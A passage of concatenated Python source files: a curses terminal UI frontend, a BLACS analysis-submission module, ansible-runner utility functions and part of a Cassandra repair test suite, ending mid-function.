refresh to screen.""" win[0].erase() if box: win[0].box() if banner: win[0].addstr(0, 1, str("| {} |".format(win[2]))) def spash_screen(self, template=None): win, _, _, _ = self.make_panel( [self.screen_h, self.screen_w, 0, 0], "splash", box=False, banner=False ) curses.panel.update_panels() self.screen.refresh() if template: for index, line in enumerate(template): if index == self.screen_h-1: break win.addstr(line[:self.screen_w-4], index, 1) win.refresh() else: # test spashscreen cycled = cycle([x for x in range(len(self.palette))]) for x in range(self.screen_h): if x == int(self.screen_h/2): win.addstr(x, int(self.screen_w/2)-7, " Ruckusist.com") win.refresh() time.sleep(.95) else: matrix = ["&", "^", "&", "$", "R", "\\", "|", "/", "-"] cycled_matrix = cycle([x for x in matrix]) for y in range(self.screen_w): if x == self.screen_h-1 and y == self.screen_w-1: break # hacks. win.addstr(x, y, next(cycled_matrix), self.palette[next(cycled)] ) win.refresh() time.sleep(0.0001) time.sleep(2) self.screen.erase() def main_test(self): """Sanity Checks.""" win1, panel1, _, __ = self.make_panel([10, 13, 5, 5], "Panel 1") win2, panel2, _, __ = self.make_panel([10, 13, 8, 8], "Panel 2") curses.panel.update_panels() self.screen.refresh() time.sleep(1) panel1.top() curses.panel.update_panels() self.screen.refresh() time.sleep(1) for i in range(5): panel2.move(8, 8 + i) # curses.panel.update_panels() self.screen.refresh() time.sleep(0.1) # time.sleep(2.5) #self.dialog_box() #self.dialog[1].top() #self.screen.refresh() #time.sleep(2.5) #self.dialog[0].erase() #self.dialog[0].refresh() # self.screen.refresh() # time.sleep(2.5) return True def new_main(self): """This is attempting a new main panel configuration""" h = self.screen_h w = self.screen_w # HEADER header_dims = [3, w, 0, 0] header = self.make_panel(header_dims, "Panel 1") h_split = int(w / 6) - 1 winleft_dims = [h-3-4-3, h_split, 3, 0] winleft = self.make_panel(winleft_dims, "Panel 2") v_split = int((h-3-4-3)/6) winright_upper_dims = [v_split, w - h_split-1, h-7-v_split, h_split + 1] winrightupper = self.make_panel(winright_upper_dims, "Panel 3") winright_lower_dims = [(h-3-4-3)-v_split, w - h_split-1, 3, h_split + 1] winrightlower = self.make_panel(winright_lower_dims, "Panel 4") footer_dims = [3, w, h-3, 0] winfooter = self.make_panel(footer_dims, "Panel 5") debug_dims = [4, w, h-7, 0] windebug = self.make_panel(debug_dims, "Panel 6") curses.panel.update_panels() self.screen.refresh() time.sleep(3) def warning(self, label, text, callback): self.screen.refresh() self.dialog_box(label) win, pan = self.dialog pan.top() win.addstr(1, 2, text, self.palette[7]) start_warning = timer() option = True while timer() <= start_warning + 10: keypress = abs(self.get_input()) if keypress == 260 or keypress == 261: # left/right option = False if option else True elif keypress == 10: # enter break win.addstr(3, 2, "Cancel", self.palette[1] if option else self.palette[0]) win.addstr(3, 9, "Confirm", self.palette[1] if not option else self.palette[0]) win.refresh() self.screen.refresh() if not option: threading.Thread(target=callback).start() win.erase() win.refresh() self.screen.refresh() def error(self, label:str, mesg:list, timeout=10): self.screen.refresh() self.dialog_box(label) win, pan = self.dialog # pan.top() start_timer = timer() counter = 3 # for line in mesg: win.addstr(counter, 2, line, self.palette[7]) counter += 1 win.refresh() self.screen.refresh() # pan.top() while timer() <= start_timer + timeout: time.sleep(0.1) win.erase() win.refresh() self.screen.refresh() def dialog_box(self, label="Warning"): win, panel, _, _ = self.make_panel([ 8, 40, int(self.screen_h/2)-int(7/2), int(self.screen_w/2)-int(40/2) ], label, box=True, banner=True) # win.addstr(3, 2, "Cancel", self.palette[1]) # win.addstr(3, 9, "Confirm") win.refresh() self.dialog = (win, panel) return win, panel def __call__(self): self.spash_screen() time.sleep(5) self.main_test() time.sleep(5) self.dialog_box() self.dialog[1].top() self.screen.refresh() time.sleep(2.5) self.dialog[0].erase() self.dialog[0].refresh() self.screen.refresh() time.sleep(2.5) self.end_safely() def main(): os.system('clear') app = Frontend() app() if __name__ == '__main__': main()
analysis_submission.py
##################################################################### # # # /analysis_submission.py # # # # Copyright 2013, Monash University # # # # This file is part of the program BLACS, in the labscript suite # # (see http://labscriptsuite.org), and is licensed under the # # Simplified BSD License. See the license.txt file in the root of # # the project for the full license. # # # ##################################################################### import logging import os import Queue import threading import time import sys if 'PySide' in sys.modules.copy(): from PySide.QtCore import * from PySide.QtGui import * else: from PyQt4.QtCore import * from PyQt4.QtGui import * from qtutils import * from zprocess import zmq_get import labscript_utils.shared_drive class AnalysisSubmission(object): def __init__(self, BLACS, blacs_ui): self.inqueue = Queue.Queue() self.BLACS = BLACS self.port = int(self.BLACS.exp_config.get('ports', 'lyse')) self._send_to_server = False self._server = '' self._server_online = 'offline' self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)),'analysis_submission.ui')) blacs_ui.analysis.addWidget(self._ui) # connect signals self._ui.send_to_server.toggled.connect(lambda state:self._set_send_to_server(state)) self._ui.server.editingFinished.connect(lambda: self._set_server(self._ui.server.text())) self._waiting_for_submission = [] self.mainloop_thread = threading.Thread(target=self.mainloop) self.mainloop_thread.daemon = True self.mainloop_thread.start() self.checking_thread = threading.Thread(target=self.check_connectivity_loop) self.checking_thread.daemon = True self.checking_thread.start() def restore_save_data(self,data): if "server" in data: self.server = data["server"] if "send_to_server" in data: self.send_to_server = data["send_to_server"] if "waiting_for_submission" in data: self._waiting_for_submission = list(data["waiting_for_submission"]) self.inqueue.put(['try again', None]) def get_save_data(self): return {"waiting_for_submission":list(self._waiting_for_submission), "server":self.server, "send_to_server":self.send_to_server } def _set_send_to_server(self,value): self.send_to_server = value def _set_server(self,server): self.server = server @property @inmain_decorator(True) def send_to_server(self): return self._send_to_server @send_to_server.setter @inmain_decorator(True) def send_to_server(self,value): self._send_to_server = bool(value) self._ui.send_to_server.setChecked(self.send_to_server) if not self.send_to_server: self.inqueue.put(['clear', None]) @property @inmain_decorator(True) def server(self): return str(self._server) @server.setter @inmain_decorator(True) def server(self,value): self._server = value self._ui.server.setText(self.server) @property @inmain_decorator(True) def server_online(self): return self._server_online @server_online.setter @inmain_decorator(True) def server_online(self,value): self._server_online = str(value) # resend any files not sent if self.server_online: self.inqueue.put(['try again', None]) # update GUI self._ui.server_online.setText(value+(' (Files to send: %d)'%len(self._waiting_for_submission) if self._waiting_for_submission else '')) def get_queue(self): return self.inqueue def mainloop(self): self._mainloop_logger = logging.getLogger('BLACS.AnalysisSubmission.mainloop') while True: signal, data = self.inqueue.get() if signal == 'close': break elif signal == 'file': if self.send_to_server: self._waiting_for_submission.append(data) self.submit_waiting_files() elif signal == 'try again': self.submit_waiting_files() elif signal == 'clear': self._waiting_for_submission = [] else: self._mainloop_logger.error('Invalid signal: %s'%str(signal)) def check_connectivity_loop(self): time_to_sleep = 1 #self._check_connectivity_logger = logging.getLogger('BLACS.AnalysisSubmission.check_connectivity_loop') while True: # get the current host: host = self.server send_to_server = self.send_to_server if host and send_to_server: try: self.server_online = 'checking' response = zmq_get(self.port, host, 'hello', timeout = 2) if response == 'hello': success = True else: success = False except Exception: success = False # update GUI self.server_online = 'online' if success else 'offline' # update how long we should sleep if success: time_to_sleep = 10 else: time_to_sleep = 1 else: self.server_online = '' # stop sleeping if the host changes for i in range(time_to_sleep*5): if host == self.server and send_to_server == self.send_to_server: time.sleep(0.2) def submit_waiting_files(self): if not self._waiting_for_submission: return while self._waiting_for_submission: path = self._waiting_for_submission[0] try: self._mainloop_logger.info('Submitting run file %s.\n'%os.path.basename(path)) data = {'filepath': labscript_utils.shared_drive.path_to_agnostic(path)} response = zmq_get(self.port, self.server, data, timeout = 2) if response != 'added successfully': raise Exception except: return else: self._waiting_for_submission.pop(0)
utils.py
import json import sys import re import os import stat import fcntl import shutil import hashlib import tempfile import subprocess import base64 import threading import pipes import uuid try: from collections.abc import Iterable, Mapping except ImportError: from collections import Iterable, Mapping from io import StringIO from six import string_types, PY2, PY3, text_type, binary_type class Bunch(object): ''' Collect a bunch of variables together in an object. This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern. ''' def __init__(self, **kwargs): self.update(**kwargs) def update(self, **kwargs): self.__dict__.update(kwargs) def isplaybook(obj): ''' Inspects the object and returns if it is a playbook Args: obj (object): The object to be inspected by this function Returns: boolean: True if the object is a list and False if it is not ''' return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping)) def isinventory(obj): ''' Inspects the object and returns if it is an inventory Args: obj (object): The object to be inspected by this function Returns: boolean: True if the object is an inventory dict and False if it is not ''' return isinstance(obj, Mapping) or isinstance(obj, string_types) def check_isolation_executable_installed(isolation_executable): ''' Check that proot is installed. ''' cmd = [isolation_executable, '--version'] try: proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) proc.communicate() return bool(proc.returncode == 0) except (OSError, ValueError) as e: if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory raise RuntimeError('bwrap unavailable for unexpected reason.') return False def dump_artifact(obj, path, filename=None): ''' Write the artifact to disk at the specified path Args: obj (string): The string object to be dumped to disk in the specified path. The artifact filename will be automatically created path (string): The full path to the artifacts data directory. filename (string, optional): The name of file to write the artifact to. If the filename is not provided, then one will be generated. Returns: string: The full path filename for the artifact that was generated ''' p_sha1 = None if not os.path.exists(path): os.makedirs(path, mode=0o700) else: p_sha1 = hashlib.sha1() p_sha1.update(obj.encode(encoding='UTF-8')) if filename is None: fd, fn = tempfile.mkstemp(dir=path) else: fn = os.path.join(path, filename) if os.path.exists(fn): c_sha1 = hashlib.sha1() with open(fn) as f: contents = f.read() c_sha1.update(contents.encode(encoding='UTF-8')) if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest(): lock_fp = os.path.join(path, '.artifact_write_lock') lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR) fcntl.lockf(lock_fd, fcntl.LOCK_EX) try: with open(fn, 'w') as f: os.chmod(fn, stat.S_IRUSR) f.write(str(obj)) finally: fcntl.lockf(lock_fd, fcntl.LOCK_UN) os.close(lock_fd) os.remove(lock_fp) return fn def cleanup_artifact_dir(path, num_keep=0): # 0 disables artifact dir cleanup/rotation if num_keep < 1: return all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)], key=lambda x: os.path.getmtime(x)) total_remove = len(all_paths) - num_keep for f in range(total_remove): shutil.rmtree(all_paths[f]) def dump_artifacts(kwargs): ''' Introspect the kwargs and dump objects to disk ''' private_data_dir = kwargs.get('private_data_dir') if not private_data_dir: private_data_dir = tempfile.mkdtemp() kwargs['private_data_dir'] = private_data_dir if not os.path.exists(private_data_dir): raise ValueError('private_data_dir path is either invalid or does not exist') if 'role' in kwargs: role = {'name': kwargs.pop('role')} if 'role_vars' in kwargs: role['vars'] = kwargs.pop('role_vars') play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}] if kwargs.pop('role_skip_facts', False): play[0]['gather_facts'] = False kwargs['playbook'] = play if 'envvars' not in kwargs: kwargs['envvars'] = {} roles_path = kwargs.pop('roles_path', None) if not roles_path: roles_path = os.path.join(private_data_dir, 'roles') else: roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles')) kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path obj = kwargs.get('playbook') if obj and isplaybook(obj): path = os.path.join(private_data_dir, 'project') kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json') obj = kwargs.get('inventory') if obj and isinventory(obj): path = os.path.join(private_data_dir, 'inventory') if isinstance(obj, Mapping): kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json') elif isinstance(obj, string_types): if not os.path.exists(obj): kwargs['inventory'] = dump_artifact(obj, path, 'hosts') for key in ('envvars', 'extravars', 'passwords', 'settings'): obj = kwargs.get(key) if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)): path = os.path.join(private_data_dir, 'env') dump_artifact(json.dumps(obj), path, key) kwargs.pop(key) for key in ('ssh_key', 'cmdline'): obj = kwargs.get(key) if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)): path = os.path.join(private_data_dir, 'env') dump_artifact(str(kwargs[key]), path, key) kwargs.pop(key) class OutputEventFilter(object): ''' File-like object that looks for encoded job events in stdout data. ''' EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K') def __init__(self, handle, event_callback, suppress_ansible_output=False, output_json=False): self._event_callback = event_callback self._counter = 0 self._start_line = 0 self._handle = handle self._buffer = StringIO() self._last_chunk = '' self._current_event_data = None self.output_json = output_json self.suppress_ansible_output = suppress_ansible_output def flush(self): # pexpect wants to flush the file it writes to, but we're not # actually capturing stdout to a raw file; we're just # implementing a custom `write` method to discover and emit events from # the stdout stream pass def write(self, data): self._buffer.write(data) # keep a sliding window of the last chunk written so we can detect # event tokens and determine if we need to perform a search of the full # buffer should_search = '\x1b[K' in (self._last_chunk + data) self._last_chunk = data # Only bother searching the buffer if we recently saw a start/end # token (\x1b[K) while should_search: value = self._buffer.getvalue() match = self.EVENT_DATA_RE.search(value) if not match: break try: base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1)) event_data = json.loads(base64.b64decode(base64_data).decode('utf-8')) except ValueError: event_data = {} event_data = self._emit_event(value[:match.start()], event_data) if not self.output_json: stdout_actual = event_data['stdout'] if 'stdout' in event_data else None else: stdout_actual = json.dumps(event_data) remainder = value[match.end():] self._buffer = StringIO() self._buffer.write(remainder) if stdout_actual and stdout_actual != "{}": if not self.suppress_ansible_output: sys.stdout.write( stdout_actual.encode('utf-8') if PY2 else stdout_actual ) sys.stdout.write("\n") sys.stdout.flush() self._handle.write(stdout_actual + "\n") self._handle.flush() self._last_chunk = remainder else: if not self.suppress_ansible_output: sys.stdout.write( data.encode('utf-8') if PY2 else data ) self._handle.write(data) self._handle.flush() # Verbose stdout outside of event data context if data and '\n' in data and self._current_event_data is None: # emit events for all complete lines we know about lines = self._buffer.getvalue().splitlines(True) # keep ends remainder = None # if last line is not a complete line, then exclude it if '\n' not in lines[-1]: remainder = lines.pop() # emit all complete lines for line in lines: self._emit_event(line) self._buffer = StringIO() # put final partial line back on buffer if remainder: self._buffer.write(remainder) def close(self): value = self._buffer.getvalue() if value: self._emit_event(value) self._buffer = StringIO() self._event_callback(dict(event='EOF')) def _emit_event(self, buffered_stdout, next_event_data=None): next_event_data = next_event_data or {} if self._current_event_data: event_data = self._current_event_data stdout_chunks = [buffered_stdout] elif buffered_stdout: event_data = dict(event='verbose') stdout_chunks = buffered_stdout.splitlines(True) else: event_data = dict() stdout_chunks = [] for stdout_chunk in stdout_chunks: if event_data.get('event') == 'verbose': event_data['uuid'] = str(uuid.uuid4()) self._counter += 1 event_data['counter'] = self._counter event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else "" n_lines = stdout_chunk.count('\n') event_data['start_line'] = self._start_line event_data['end_line'] = self._start_line + n_lines self._start_line += n_lines if self._event_callback: self._event_callback(event_data) if next_event_data.get('uuid', None): self._current_event_data = next_event_data else: self._current_event_data = None return event_data def open_fifo_write(path, data): '''open_fifo_write opens the fifo named pipe in a new thread. This blocks the thread until an external process (such as ssh-agent) reads data from the pipe. ''' os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR) threading.Thread(target=lambda p, d: open(p, 'wb').write(d), args=(path, data)).start() def args2cmdline(*args): return ' '.join([pipes.quote(a) for a in args]) def ensure_str(s, encoding='utf-8', errors='strict'): """ Copied from six==1.12 Coerce *s* to `str`. For Python 2: - `unicode` -> encoded to `str` - `str` -> `str` For Python 3: - `str` -> `str` - `bytes` -> decoded to `str` """ if not isinstance(s, (text_type, binary_type)): raise TypeError("not expecting type '%s'" % type(s)) if PY2 and isinstance(s, text_type): s = s.encode(encoding, errors) elif PY3 and isinstance(s, binary_type): s = s.decode(encoding, errors) return s
repair_test.py
import os import os.path import threading import time import re import pytest import logging from collections import namedtuple from threading import Thread from cassandra import ConsistencyLevel from cassandra.query import SimpleStatement from ccmlib.node import ToolError from dtest import FlakyRetryPolicy, Tester, create_ks, create_cf from tools.data import insert_c1c2, query_c1c2 from tools.jmxutils import JolokiaAgent, make_mbean since = pytest.mark.since logger = logging.getLogger(__name__) def _repair_options(version, ks='', cf=None, sequential=True): """ Function for assembling appropriate repair CLI options, based on C* version, as defaults have changed. @param ks The keyspace to repair @param cf The table to repair @param sequential If the repair should be a sequential repair [vs parallel] """ opts = [] # since version 2.2, default is parallel, otherwise it's sequential if sequential: if version >= '2.2': opts += ['-seq'] else: if version < '2.2': opts += ['-par'] # test with full repair if version >= '2.2': opts += ['-full'] if ks: opts += [ks] if cf: opts += [cf] return opts class BaseRepairTest(Tester): def check_rows_on_node(self, node_to_check, rows, found=None, missings=None, restart=True): """ Function to verify the rows on a given node, without interference from the other nodes in the cluster @param node_to_check The given node to check. Should be the node, not the index @param rows The number of rows we expect @param found A list of partition keys that we expect to be on the node @param missings A list of partition keys we expect NOT to be on the node @param restart Whether or not we should restart the nodes we shut down to perform the assertions. Should only be False if the call to check_rows_on_node is the last line in the test. """ if found is None: found = [] if missings is None: missings = [] stopped_nodes = [] for node in list(self.cluster.nodes.values()): if node.is_running() and node is not node_to_check: stopped_nodes.append(node) node.stop(wait_other_notice=True) session = self.patient_exclusive_cql_connection(node_to_check, 'ks') result = list(session.execute("SELECT * FROM cf LIMIT {}".format(rows * 2), timeout=10)) assert len(result) == rows for k in found: query_c1c2(session, k, ConsistencyLevel.ONE) for k in missings: query = SimpleStatement("SELECT c1, c2 FROM cf WHERE key='k{}'".format(k), consistency_level=ConsistencyLevel.ONE) res = list(session.execute(query)) assert len([x for x in res if len(x) != 0]) == 0, res if restart: for node in stopped_nodes: node.start(wait_for_binary_proto=True) def _populate_cluster(self, start=True): cluster = self.cluster # Disable hinted handoff and set batch commit log so this doesn't # interfere with the test (this must be after the populate) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() session = self.patient_cql_connection(node1, retry_policy=FlakyRetryPolicy(max_retries=15)) create_ks(session, 'ks', 3) if cluster.version() < '4.0': create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'}) else: create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}) # Insert 1000 keys, kill node 3, insert 1 key, restart node 3, insert 1000 more keys logger.debug("Inserting data...") insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL) node3.flush() node3.stop(wait_other_notice=True) insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.TWO) node3.start(wait_for_binary_proto=True) insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL) cluster.flush() def _repair_and_verify(self, sequential=True): cluster = self.cluster node1, node2, node3 = cluster.nodelist() # Verify that node3 has only 2000 keys logger.debug("Checking data on node3...") self.check_rows_on_node(node3, 2000, missings=[1000]) # Verify that node1 has 2001 keys logger.debug("Checking data on node1...") self.check_rows_on_node(node1, 2001, found=[1000]) # Verify that node2 has 2001 keys logger.debug("Checking data on node2...") self.check_rows_on_node(node2, 2001, found=[1000]) time.sleep(10) # see CASSANDRA-4373 # Run repair start = time.time() logger.debug("starting repair...") node1.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential)) logger.debug("Repair time: {end}".format(end=time.time() - start)) # Validate that only one range was transfered out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]) valid_out_of_sync_pairs = [{node1.address(), node3.address()}, {node2.address(), node3.address()}] for line, m in out_of_sync_logs: num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, \ "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes) # Check node3 now has the key self.check_rows_on_node(node3, 2001, found=[1000], restart=False) class TestRepair(BaseRepairTest): @since('2.2.1', max_version='4') def test_no_anticompaction_after_dclocal_repair(self): """ * Launch a four node, two DC cluster * Start a -local repair on node1 in dc1 * Assert that the dc1 nodes see repair messages * Assert that the dc2 nodes do not see repair messages * Assert no nodes anticompact # TODO: Verify the anticompaction with sstablemetadata, not just logs @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([2, 2]).start() node1_1, node2_1, node1_2, node2_2 = cluster.nodelist() node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50']) node1_1.nodetool("repair -local keyspace1 standard1") assert node1_1.grep_log("Not a global repair") assert node2_1.grep_log("Not a global repair") # dc2 should not see these messages: assert not node1_2.grep_log("Not a global repair") assert not node2_2.grep_log("Not a global repair") # and no nodes should do anticompaction: for node in cluster.nodelist(): assert not node.grep_log("Starting anticompaction") # @pytest.mark.skipif(CASSANDRA_VERSION_FROM_BUILD == '3.9', reason="Test doesn't run on 3.9") @pytest.mark.skip_version('3.9') def test_nonexistent_table_repair(self): """ * Check that repairing a non-existent table fails @jira_ticket CASSANDRA-12279 """ self.fixture_dtest_setup.ignore_log_patterns = [r'Unknown keyspace/cf pair'] cluster = self.cluster logger.debug('Starting nodes') cluster.populate(2).start() node1, _ = cluster.nodelist() logger.debug('Creating keyspace and tables') node1.stress(stress_options=['write', 'n=1', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=1']) logger.debug('Repairing non-existent table') def repair_non_existent_table(): global nodetool_error try: node1.nodetool('repair keyspace1 standard2') except Exception as e: nodetool_error = e # Launch in a external thread so it does not hang process t = Thread(target=repair_non_existent_table) t.start() t.join(timeout=60) assert not t.is_alive(), 'Repair thread on inexistent table is still running' if self.cluster.version() >= '2.2': node1.watch_log_for("Unknown keyspace/cf pair", timeout=60) # Repair only finishes with error status after CASSANDRA-12508 on 3.0+ if self.cluster.version() >= '3.0': assert 'nodetool_error' in globals() and isinstance(nodetool_error, ToolError), \ 'Repair thread on inexistent table did not throw exception' logger.debug(repr(nodetool_error)) assert 'Unknown keyspace/cf pair' in repr(nodetool_error),\ 'Repair thread on inexistent table did not detect inexistent table.' @since('2.2.1', max_version='4') def test_no_anticompaction_after_hostspecific_repair(self): """ * Launch a four node, two DC cluster * Start a repair on all nodes, by enumerating with -hosts * Assert all nodes see a repair messages * Assert no nodes anticompact # TODO: Verify the anticompaction with sstablemetadata, not just logs @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([2, 2]).start() node1_1, node2_1, node1_2, node2_2 = cluster.nodelist() node1_1.stress(stress_options=['write', 'n=100K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50']) node1_1.nodetool("repair -hosts 127.0.0.1,127.0.0.2,127.0.0.3,127.0.0.4 keyspace1 standard1") for node in cluster.nodelist(): assert node.grep_log("Not a global repair") for node in cluster.nodelist(): assert not node.grep_log("Starting anticompaction") @since('2.2.4', max_version='4') def test_no_anticompaction_after_subrange_repair(self): """ * Launch a three node, two DC cluster * Start a repair on a token range * Assert all nodes see repair messages * Assert no nodes anticompact # TODO: Verify the anticompaction with sstablemetadata, not just logs @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50']) node1.nodetool("repair -st 0 -et 1000 keyspace1 standard1") for node in cluster.nodelist(): assert node.grep_log("Not a global repair") for node in cluster.nodelist(): assert not node.grep_log("Starting anticompaction") def _get_repaired_data(self, node, keyspace): """ Based on incremental_repair_test.py:TestIncRepair implementation. """ _sstable_name = re.compile('SSTable: (.+)') _repaired_at = re.compile(r'Repaired at: (\d+)') _sstable_data = namedtuple('_sstabledata', ('name', 'repaired')) out = node.run_sstablemetadata(keyspace=keyspace).stdout def matches(pattern): return [_f for _f in [pattern.match(l) for l in out.split('\n')] if _f] names = [m.group(1) for m in matches(_sstable_name)] repaired_times = [int(m.group(1)) for m in matches(_repaired_at)] assert names assert repaired_times return [_sstable_data(*a) for a in zip(names, repaired_times)] @since('2.2.10', max_version='4') def test_no_anticompaction_of_already_repaired(self): """ * Launch three node cluster and stress with RF2 * Do incremental repair to have all sstables flagged as repaired * Stop node2, stress, start again and run full -pr repair * Verify that none of the already repaired sstables have been anti-compacted again @jira_ticket CASSANDRA-13153 """ cluster = self.cluster logger.debug("Starting cluster..") # disable JBOD conf since the test expects sstables to be on the same disk cluster.set_datadir_count(1) cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() # we use RF to make sure to cover only a set of sub-ranges when doing -full -pr node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=50']) # disable compaction to make sure that we won't create any new sstables with repairedAt 0 node1.nodetool('disableautocompaction keyspace1 standard1') # Do incremental repair of all ranges. All sstables are expected for have repairedAt set afterwards. node1.nodetool("repair keyspace1 standard1") meta = self._get_repaired_data(node1, 'keyspace1') repaired = set([m for m in meta if m.repaired > 0]) assert len(repaired) == len(meta) # stop node2, stress and start full repair to find out how synced ranges affect repairedAt values node2.stop(wait_other_notice=True) node1.stress(stress_options=['write', 'n=40K', 'no-warmup', 'cl=ONE', '-rate', 'threads=50']) node2.start(wait_for_binary_proto=True) node1.nodetool("repair -full -pr keyspace1 standard1") meta = self._get_repaired_data(node1, 'keyspace1') repairedAfterFull = set([m for m in meta if m.repaired > 0]) # already repaired sstables must remain untouched assert repaired.intersection(repairedAfterFull) == repaired @since('2.2.1', '4') def test_anticompaction_after_normal_repair(self): """ * Launch a four node, two DC cluster * Start a normal repair * Assert every node anticompacts @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([2, 2]).start() node1_1, node2_1, node1_2, node2_2 = cluster.nodelist() node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)']) node1_1.nodetool("repair keyspace1 standard1") for node in cluster.nodelist(): assert "Starting anticompaction" def test_simple_sequential_repair(self): """ Calls simple repair test with a sequential repair """ self._simple_repair(sequential=True) def test_simple_parallel_repair(self): """ Calls simple repair test with a parallel repair """ self._simple_repair(sequential=False) def test_empty_vs_gcable_sequential_repair(self): """ Calls empty_vs_gcable repair test with a sequential repair """ self._empty_vs_gcable_no_repair(sequential=True) def test_empty_vs_gcable_parallel_repair(self): """ Calls empty_vs_gcable repair test with a parallel repair """ self._empty_vs_gcable_no_repair(sequential=False) def test_range_tombstone_digest_sequential_repair(self): """ Calls range_tombstone_digest with a sequential repair """ self._range_tombstone_digest(sequential=True) def test_range_tombstone_digest_parallel_repair(self): """ Calls range_tombstone_digest with a parallel repair """ self._range_tombstone_digest(sequential=False) @since('2.1') def test_shadowed_cell_digest_sequential_repair(self): """ Calls _cell_shadowed_by_range_tombstone with sequential repair """ self._cell_shadowed_by_range_tombstone(sequential=True) @since('2.1') def test_shadowed_cell_digest_parallel_repair(self): """ Calls _cell_shadowed_by_range_tombstone with parallel repair """ self._cell_shadowed_by_range_tombstone(sequential=False) @since('3.0') def test_shadowed_range_tombstone_digest_sequential_repair(self): """ Calls _range_tombstone_shadowed_by_range_tombstone with sequential repair """ self._range_tombstone_shadowed_by_range_tombstone(sequential=True) @since('3.0') def test_shadowed_range_tombstone_digest_parallel_repair(self): """ Calls _range_tombstone_shadowed_by_range_tombstone with parallel repair """ self._range_tombstone_shadowed_by_range_tombstone(sequential=False) @pytest.mark.no_vnodes def test_simple_repair_order_preserving(self): """ Calls simple repair test with OPP and sequential repair @jira_ticket CASSANDRA-5220 """ self._simple_repair(order_preserving_partitioner=True) def _simple_repair(self, order_preserving_partitioner=False, sequential=True): """ * Configure a three node cluster to not use hinted handoff, and to use batch commitlog * Launch the cluster * Create a keyspace at RF 3 and table * Insert one thousand rows at CL ALL * Flush on node3 and shut it down * Insert one row at CL TWO * Restart node3 * Insert one thousand more rows at CL ALL * Flush all nodes * Check node3 only has 2000 keys * Check node1 and node2 have 2001 keys * Perform the repair type specified by the parent test * Assert the appropriate messages are logged * Assert node3 now has all data @jira_ticket CASSANDRA-4373 """ if order_preserving_partitioner: self.cluster.set_partitioner('org.apache.cassandra.dht.ByteOrderedPartitioner') self._populate_cluster() self._repair_and_verify(sequential) def _empty_vs_gcable_no_repair(self, sequential): """ Repairing empty partition and tombstoned partition older than gc grace should be treated as the same and no repair is necessary. @jira_ticket CASSANDRA-8979. """ cluster = self.cluster cluster.populate(2) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) cluster.start() node1, node2 = cluster.nodelist() session = self.patient_cql_connection(node1) # create keyspace with RF=2 to be able to be repaired create_ks(session, 'ks', 2) # we create two tables, one has low gc grace seconds so that the data # can be dropped during test (but we don't actually drop them). # the other has default gc. # compaction is disabled not to purge data query = """ CREATE TABLE cf1 ( key text, c1 text, c2 text, PRIMARY KEY (key, c1) ) WITH gc_grace_seconds=1 AND compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'}; """ session.execute(query) time.sleep(.5) query = """ CREATE TABLE cf2 ( key text, c1 text, c2 text, PRIMARY KEY (key, c1) ) WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'}; """ session.execute(query) time.sleep(.5) # take down node2, so that only node1 has gc-able data node2.stop(wait_other_notice=True) for 